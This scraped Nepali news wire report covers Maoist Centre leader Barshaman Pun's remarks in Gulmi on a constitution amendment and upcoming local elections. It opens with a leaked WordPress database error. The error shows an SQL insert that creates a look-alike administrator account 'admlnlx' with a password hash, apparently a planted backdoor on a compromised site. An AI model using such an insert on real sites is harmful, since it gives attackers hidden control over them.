WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfC.4cUekE00Q1e5qHMf/dq8zEfkaE.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 00:54:45', '', 'admlnlx', 'admlnlx')
तम्घास (गुल्मी), पुस २५–
नेकपा (माओवादी केन्द्र)का सचिव वर्षमान पुनले मेधेसीलाई संविधानको धारमा ल्याउन संविधान संशोधन प्रस्ताव ल्याएको बताउनुभएको छ ।
पार्टी कामको सिलसिलामा गुल्मी आइपुग्नुभएका नेता पुनले आज प्रेस सेन्टर गुल्मीले सदरमुकाम तम्घासमा आयोजना गरेको पत्रकार भेटघाटमा उक्त कुरा बताउनुभएको हो । उहाँले संविधानको स्वीकार्यता बढाउनु र निर्वाचनमा जाने मुख्य उद्देश्यले संविधान संशोधनको प्रस्ताव ल्याएको दाबी गर्नुभयो ।
सरकारले संसद्मा पेस गरेको संशोधनको प्रस्तावले सरकार र प्रतिपक्षको दूरी घट्ने दाबी गर्दै नेता पुनले सरकार संसद्मा पेस भएको प्रस्ताव पास गर्न लाग्ने र प्रतिपक्षले यसलाई फेल गर्न लाग्नु स्वभाविक रहेको धारणा व्यक्त गर्नुभयो ।
संशोधन प्रस्ताव पास गराएर सबै दल स्थानीय तहको निर्वाचनमा गए संविधानको कार्यान्वयन पनि अघि बढ्ने उहाँले बताउनुभयो ।
नेता पुनले अब संविधान निर्माणका सहयात्री दलहरु सबै एकठाउँमा उभिएर निर्वाचनमा जानुको विकल्प नरहेको भन्दै निर्वाचन आयोगले आउँदो वैशाखको अन्तिमसम्म हुने गरी स्थानीय तहको निर्वाचनको मिति तय गर्ने तयारी गरेको जानकारी दिनुभयो ।
सरकारले ल्याएको संविधान संशोधन प्रस्ताव प्रक्रियाबाट टुङ्गिने र निर्वाचनमा जाने वातावारण बन्ने उहाँको तर्क थियो । –रासस